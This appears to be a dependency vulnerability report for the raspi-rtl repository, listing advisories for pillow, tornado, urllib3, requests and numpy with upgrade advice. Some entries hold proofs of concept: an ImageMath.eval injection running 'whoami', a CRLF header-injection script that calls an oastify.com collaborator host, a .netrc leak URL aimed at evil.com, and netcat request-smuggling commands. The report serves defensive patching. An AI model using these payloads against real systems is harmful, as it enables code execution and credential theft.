Find, fix and prevent vulnerabilities in your code.
critical severity
- Vulnerable module: pillow
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › pillow@9.5.0Remediation: Upgrade to bokeh@3.2.2.
Overview
Pillow is a PIL (Python Imaging Library) fork.
Affected versions of this package are vulnerable to Heap-based Buffer Overflow when the ReadHuffmanCodes() function is used. An attacker can craft a special WebP lossless file that triggers the ReadHuffmanCodes() function to allocate the HuffmanCode buffer with a size that comes from an array of precomputed sizes: kTableSize. The color_cache_bits value defines which size to use. The kTableSize array only takes into account sizes for 8-bit first-level table lookups but not second-level table lookups. libwebp allows codes that are up to 15-bit (MAX_ALLOWED_CODE_LENGTH). When BuildHuffmanTable() attempts to fill the second-level tables it may write data out-of-bounds. The OOB write to the undersized array happens in ReplicateValue.
Notes:
This is only exploitable if the color_cache_bits value defines which size to use.
This vulnerability was also published on libwebp CVE-2023-5129
Changelog:
2023-09-12: Initial advisory publication
2023-09-27: Advisory details updated, including CVSS, references
2023-09-27: CVE-2023-5129 rejected as a duplicate of CVE-2023-4863
2023-09-28: Research and addition of additional affected libraries
2024-01-28: Additional fix information
Remediation
Upgrade Pillow to version 10.0.1 or higher.
References
high severity
- Vulnerable module: urllib3
- Introduced through: codecov@2.1.13 and python-coveralls@2.9.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › codecov@2.1.13 › requests@2.31.0 › urllib3@2.0.7
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › python-coveralls@2.9.3 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to python-coveralls@2.9.3.
Overview
urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling during the decompression of compressed response data. An attacker can cause excessive CPU and memory consumption by sending responses with a large number of chained compression steps.
Workaround
This vulnerability can be avoided by setting preload_content=False and ensuring that resp.headers["content-encoding"] are limited to a safe quantity before reading.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade urllib3 to version 2.6.0 or higher.
References
high severity
- Vulnerable module: urllib3
- Introduced through: codecov@2.1.13 and python-coveralls@2.9.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › codecov@2.1.13 › requests@2.31.0 › urllib3@2.0.7
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › python-coveralls@2.9.3 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to python-coveralls@2.9.3.
Overview
urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) in the Streaming API. The ContentDecoder class can be forced to allocate disproportionate resources when processing a single chunk with very high compression, such as via the stream(), read(amt=256), read1(amt=256), read_chunked(amt=256), and readinto(b) functions.
Note: It is recommended to patch Brotli dependencies (upgrade to at least 1.2.0) if they are installed outside of urllib3 as well, to avoid other instances of the same vulnerability.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade urllib3 to version 2.6.0 or higher.
References
high severity
- Vulnerable module: urllib3
- Introduced through: codecov@2.1.13 and python-coveralls@2.9.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › codecov@2.1.13 › requests@2.31.0 › urllib3@2.0.7
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › python-coveralls@2.9.3 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to python-coveralls@2.9.3.
Overview
urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) via the streaming API when handling HTTP redirects. An attacker can cause excessive resource consumption by serving a specially crafted compressed response that triggers decompression of large amounts of data before any read limits are enforced.
Note: This is only exploitable if content is streamed from untrusted sources with redirects enabled.
Workaround
This vulnerability can be mitigated by disabling redirects by setting redirect=False for requests to untrusted sources.
Remediation
Upgrade urllib3 to version 2.6.3 or higher.
References
high severity
- Vulnerable module: tornado
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › tornado@6.2Remediation: Upgrade to bokeh@3.2.2.
Overview
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the multipart/form-data parser. An attacker can generate an extremely high volume of logs, leading to a denial of service by sending malformed multipart form data that triggers continuous error logging.
Note:
This is only exploitable if the logging subsystem is synchronous.
Workaround
This vulnerability can be mitigated by blocking Content-Type: multipart/form-data in a proxy.
Remediation
Upgrade tornado to version 6.5 or higher.
References
high severity
- Vulnerable module: tornado
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › tornado@6.2Remediation: Upgrade to bokeh@3.2.2.
Overview
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to Excessive Iteration in the _parseparam() function. An attacker can cause the server to become unresponsive and consume excessive CPU resources by sending requests with a large number of maliciously crafted parameters in the Content-Disposition header.
Remediation
Upgrade tornado to version 6.5.3 or higher.
References
high severity
- Vulnerable module: tornado
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › tornado@6.2Remediation: Upgrade to bokeh@3.2.2.
Overview
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to Inefficient Algorithmic Complexity in the HTTPHeaders.add method. An attacker can cause the server's event loop to become unresponsive for an extended period by sending a single maliciously crafted HTTP request with repeated header names, leading to excessive string concatenation and high CPU usage.
Note:
This is only exploitable if the max_header_size configuration has been increased from its default value.
Remediation
Upgrade tornado to version 6.5.3 or higher.
References
high severity
- Vulnerable module: pillow
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › pillow@9.5.0Remediation: Upgrade to bokeh@3.2.2.
Overview
Affected versions of this package are vulnerable to Eval Injection via the PIL.ImageMath.eval function when an attacker has control over the keys passed to the environment argument.
PoC
from PIL import Image, ImageMath
image1 = Image.open('__class__')
image2 = Image.open('__bases__')
image3 = Image.open('__subclasses__')
image4 = Image.open('load_module')
image5 = Image.open('system')
expression = "().__class__.__bases__[0].__subclasses__()[104].load_module('os').system('whoami')"
environment = {
image1.filename: image1,
image2.filename: image2,
image3.filename: image3,
image4.filename: image4,
image5.filename: image5
}
ImageMath.eval(expression, **environment)
Remediation
Upgrade pillow to version 10.2.0 or higher.
References
high severity
- Vulnerable module: pillow
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › pillow@9.5.0Remediation: Upgrade to bokeh@3.2.2.
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS) when using arbitrary strings as text input and the number of characters passed into PIL.ImageFont.ImageFont.getmask() is over a certain limit. This can lead to a system crash.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade pillow to version 10.2.0 or higher.
References
high severity
- Vulnerable module: pillow
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › pillow@9.5.0Remediation: Upgrade to bokeh@3.2.2.
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS) if the size of individual glyphs extends beyond the bitmap image, when using PIL.ImageFont.ImageFont function. Exploiting this vulnerability could lead to a system crash.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade pillow to version 10.2.0 or higher.
References
high severity
- Vulnerable module: pillow
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › pillow@9.5.0Remediation: Upgrade to bokeh@3.2.2.
Overview
Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') when the ImageFont truetype in an ImageDraw instance operates on a long text argument. An attacker can cause the service to crash by processing a task that uncontrollably allocates memory.
Remediation
Upgrade pillow to version 10.0.0 or higher.
References
high severity
- Vulnerable module: bokeh
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3Remediation: Upgrade to bokeh@3.8.2.
Overview
bokeh is an Interactive plots and applications in the browser from Python
Affected versions of this package are vulnerable to Missing Origin Validation in WebSockets via the match_host function in the server/util.py file. An attacker can gain unauthorized access to sensitive data or modify visualizations by exploiting flawed hostname validation logic in WebSocket connections.
Note: This is only exploitable if the server is deployed with an allowlist and the attacker can register a domain that starts with an allowed pattern.
Remediation
Upgrade bokeh to version 3.8.2 or higher.
References
medium severity
- Vulnerable module: tornado
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › tornado@6.2Remediation: Upgrade to bokeh@3.2.2.
Overview
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to inefficient cookie parsing that results in quadratic performance. An attacker could cause tornado to consume excessive CPU resources and block the event loop through maliciously crafted cookies.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade tornado to version 6.4.2 or higher.
References
medium severity
- Vulnerable module: zipp
- Introduced through: pytest-cov@4.1.0
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › pytest-cov@4.1.0 › pytest@7.4.4 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to pytest-cov@5.0.0.
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › pytest-cov@4.1.0 › pytest@7.4.4 › pluggy@1.2.0 › importlib-metadata@6.7.0 › zipp@3.15.0Remediation: Upgrade to pytest-cov@5.0.0.
Overview
Affected versions of this package are vulnerable to Infinite loop where an attacker can cause the application to stop responding by initiating a loop through functions affecting the Path module, such as joinpath, the overloaded division operator, and iterdir.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade zipp to version 3.19.1 or higher.
References
medium severity
- Vulnerable module: tornado
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › tornado@6.2Remediation: Upgrade to bokeh@3.2.2.
Overview
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to HTTP Request Smuggling via the parse and validate strings capabilities in the int constructor.
Notes:
- This is possible when Tornado is deployed behind certain proxies that interpret those non-standard characters differently.
- This is known to apply to older versions of
haproxy, although the current release is not affected.
Remediation
Upgrade tornado to version 6.3.3 or higher.
References
medium severity
- Vulnerable module: tornado
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › tornado@6.2Remediation: Upgrade to bokeh@3.2.2.
Overview
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to Improper Neutralization of CRLF Sequences ('CRLF Injection') through the CurlAsyncHTTPClient headers. An attacker can manipulate HTTP headers and construct unauthorized requests by injecting CRLF sequences into header values.
PoC
The issue can be reproduced using the following script:
import asyncio
from tornado import httpclient
from tornado import curl_httpclient
async def main():
http_client = curl_httpclient.CurlAsyncHTTPClient()
request = httpclient.HTTPRequest(
# Burp Collaborator payload
"http://727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com/",
method="POST",
body="body",
# Injected header using CRLF characters
headers={"Foo": "Bar\r\nHeader: Injected"}
)
response = await http_client.fetch(request)
print(response.body)
http_client.close()
if __name__ == "__main__":
asyncio.run(main())
When the specified server receives the request, it contains the injected header (Header: Injected) on its own line:
POST / HTTP/1.1
Host: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com
User-Agent: Mozilla/5.0 (compatible; pycurl)
Accept: */*
Accept-Encoding: gzip,deflate
Foo: Bar
Header: Injected
Content-Length: 4
Content-Type: application/x-www-form-urlencoded
body
The attacker can also construct entirely new requests using a payload with multiple CRLF sequences. For example, specifying a header value of \r\n\r\nPOST /attacker-controlled-url HTTP/1.1\r\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com results in the server receiving an additional, attacker-controlled request:
POST /attacker-controlled-url HTTP/1.1
Host: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com
Content-Length: 4
Content-Type: application/x-www-form-urlencoded
body
Remediation
Upgrade tornado to version 6.4.1 or higher.
References
medium severity
- Vulnerable module: urllib3
- Introduced through: codecov@2.1.13 and python-coveralls@2.9.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › codecov@2.1.13 › requests@2.31.0 › urllib3@2.0.7
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › python-coveralls@2.9.3 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to python-coveralls@2.9.3.
Overview
urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to Improper Removal of Sensitive Information Before Storage or Transfer due to the improper handling of the Proxy-Authorization header during cross-origin redirects when ProxyManager is not in use. When the conditions below are met, including non-recommended configurations, the contents of this header can be sent in an automatic HTTP redirect.
Notes:
To be vulnerable, the application must be doing all of the following:
Setting the
Proxy-Authorizationheader without using urllib3's built-in proxy support.Not disabling HTTP redirects (e.g. with
redirects=False)Either not using an HTTPS origin server, or having a proxy or target origin that redirects to a malicious origin.
Workarounds
Using the
Proxy-Authorizationheader with urllib3'sProxyManager.Disabling HTTP redirects using
redirects=Falsewhen sending requests.Not using the
Proxy-Authorizationheader.
Remediation
Upgrade urllib3 to version 1.26.19, 2.2.2 or higher.
References
medium severity
- Vulnerable module: urllib3
- Introduced through: codecov@2.1.13 and python-coveralls@2.9.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › codecov@2.1.13 › requests@2.31.0 › urllib3@2.0.7
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › python-coveralls@2.9.3 › requests@2.31.0 › urllib3@2.0.7Remediation: Upgrade to python-coveralls@2.9.3.
Overview
urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to Open Redirect due to the retries parameter being ignored during PoolManager instantiation. An attacker can access unintended resources or endpoints by leveraging automatic redirects when the application expects redirects to be disabled at the connection pool level.
Note:
requests and botocore users are not affected.
Workaround
This can be mitigated by disabling redirects at the request() level instead of the PoolManager() level.
Remediation
Upgrade urllib3 to version 2.5.0 or higher.
References
medium severity
- Vulnerable module: pillow
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › pillow@9.5.0Remediation: Upgrade to bokeh@3.2.2.
Overview
Affected versions of this package are vulnerable to Buffer Overflow via the strcpy function in _imagingcms.c, due to two calls that were able to copy too much data into fixed length strings.
Remediation
Upgrade pillow to version 10.3.0 or higher.
References
medium severity
- Vulnerable module: requests
- Introduced through: codecov@2.1.13 and python-coveralls@2.9.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › codecov@2.1.13 › requests@2.31.0
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › python-coveralls@2.9.3 › requests@2.31.0Remediation: Upgrade to python-coveralls@2.9.3.
Overview
Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data due to incorrect URL processing. An attacker could craft a malicious URL that, when processed by the library, tricks it into sending the victim's .netrc credentials to a server controlled by the attacker.
Note:
This is only exploitable if the .netrc file contains an entry for the hostname that the attacker includes in the crafted URL's "intended" part (e.g., example.com in http://example.com:@evil.com/).
PoC
requests.get('http://example.com:@evil.com/')
Remediation
Upgrade requests to version 2.32.4 or higher.
References
medium severity
- Vulnerable module: requests
- Introduced through: codecov@2.1.13 and python-coveralls@2.9.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › codecov@2.1.13 › requests@2.31.0
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › python-coveralls@2.9.3 › requests@2.31.0Remediation: Upgrade to python-coveralls@2.9.3.
Overview
Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session. An attacker can bypass certificate verification by making the first request with verify=False, causing all subsequent requests to ignore certificate verification regardless of changes to the verify value.
Notes:
For requests <2.32.0, avoid setting
verify=Falsefor the first request to a host while using a Requests Session.For requests <2.32.0, call
close()on Session objects to clear existing connections ifverify=Falseis used.This vulnerability was initially fixed in version 2.32.0, which was yanked. Therefore, the next available fixed version is 2.32.2.
Remediation
Upgrade requests to version 2.32.2 or higher.
References
medium severity
- Vulnerable module: tornado
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › tornado@6.2Remediation: Upgrade to bokeh@3.2.2.
Overview
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to HTTP Request Smuggling due to improper parsing of the -, +, and _ characters in chunk length and Content-Length fields through the int constructor.
Note: Exploiting this vulnerability is possible if Tornado is deployed behind certain proxies that interpret non-standard characters differently, such as older versions of haproxy.
Remediation
Upgrade tornado to version 6.3.3 or higher.
References
medium severity
- Vulnerable module: tornado
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › tornado@6.2Remediation: Upgrade to bokeh@3.2.2.
Overview
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to HTTP Header Injection via the reason argument in HTTP status handling. An attacker can inject arbitrary HTTP headers or execute malicious scripts in the browser by supplying crafted input to the RequestHandler.set_status or tornado.web.HTTPError parameters.
##Workaround
This issue can be mitigated by controlling the usage of untrusted data for the reason argument.
Remediation
Upgrade tornado to version 6.5.3 or higher.
References
medium severity
- Vulnerable module: tornado
- Introduced through: bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › tornado@6.2Remediation: Upgrade to bokeh@3.2.2.
Overview
tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed.
Affected versions of this package are vulnerable to HTTP Request Smuggling due to the handling of multiple Transfer-Encoding: chunked headers. An attacker can desynchronize the connection and potentially bypass ACLs or poison caches by sending crafted requests with duplicate Transfer-Encoding: chunked headers.
PoC
Install Tornado
Start a simple Tornado server that echoes each received request's body:
cat << EOF > server.py
import asyncio
import tornado
class MainHandler(tornado.web.RequestHandler):
def post(self):
self.write(self.request.body)
async def main():
tornado.web.Application([(r"/", MainHandler)]).listen(8000)
await asyncio.Event().wait()
asyncio.run(main())
EOF
python3 server.py &
Send a valid chunked request:
printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000
Observe that the response is as expected:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:32:05 GMT
Content-Length: 1
Z
Send a request with two Transfer-Encoding: chunked headers:
printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\n0\r\n\r\n' | nc localhost 8000
Observe the strange response:
HTTP/1.1 200 OK
Server: TornadoServer/6.3.3
Content-Type: text/html; charset=UTF-8
Date: Sat, 07 Oct 2023 17:35:40 GMT
Content-Length: 0
HTTP/1.1 400 Bad Request
Remediation
Upgrade tornado to version 6.4.1 or higher.
References
medium severity
new
- Module: certifi
- Introduced through: codecov@2.1.13 and python-coveralls@2.9.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › codecov@2.1.13 › requests@2.31.0 › certifi@2026.2.25
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › python-coveralls@2.9.3 › requests@2.31.0 › certifi@2026.2.25
MPL-2.0 license
low severity
- Vulnerable module: numpy
- Introduced through: numpy@1.21.3 and bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › numpy@1.21.3Remediation: Upgrade to numpy@1.22.0.
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › numpy@1.21.3Remediation: Upgrade to bokeh@3.2.2.
Overview
numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to Buffer Overflow due to missing boundary checks in the array_from_pyobj function of fortranobject.c. This may allow an attacker to conduct Denial of Service by carefully constructing an array with negative values.
Remediation
Upgrade numpy to version 1.22.0 or higher.
References
low severity
- Vulnerable module: numpy
- Introduced through: numpy@1.21.3 and bokeh@2.4.3
Detailed paths
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › numpy@1.21.3Remediation: Upgrade to numpy@1.22.0.
-
Introduced through: kelceydamage/raspi-rtl@kelceydamage/raspi-rtl#730abf62bc32888bff6f1324254313b9e5c97e38 › bokeh@2.4.3 › numpy@1.21.3Remediation: Upgrade to bokeh@3.2.2.
Overview
numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to Denial of Service (DoS) due to an incomplete string comparison in the numpy.core component, which may allow attackers to fail the APIs via constructing specific string objects.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
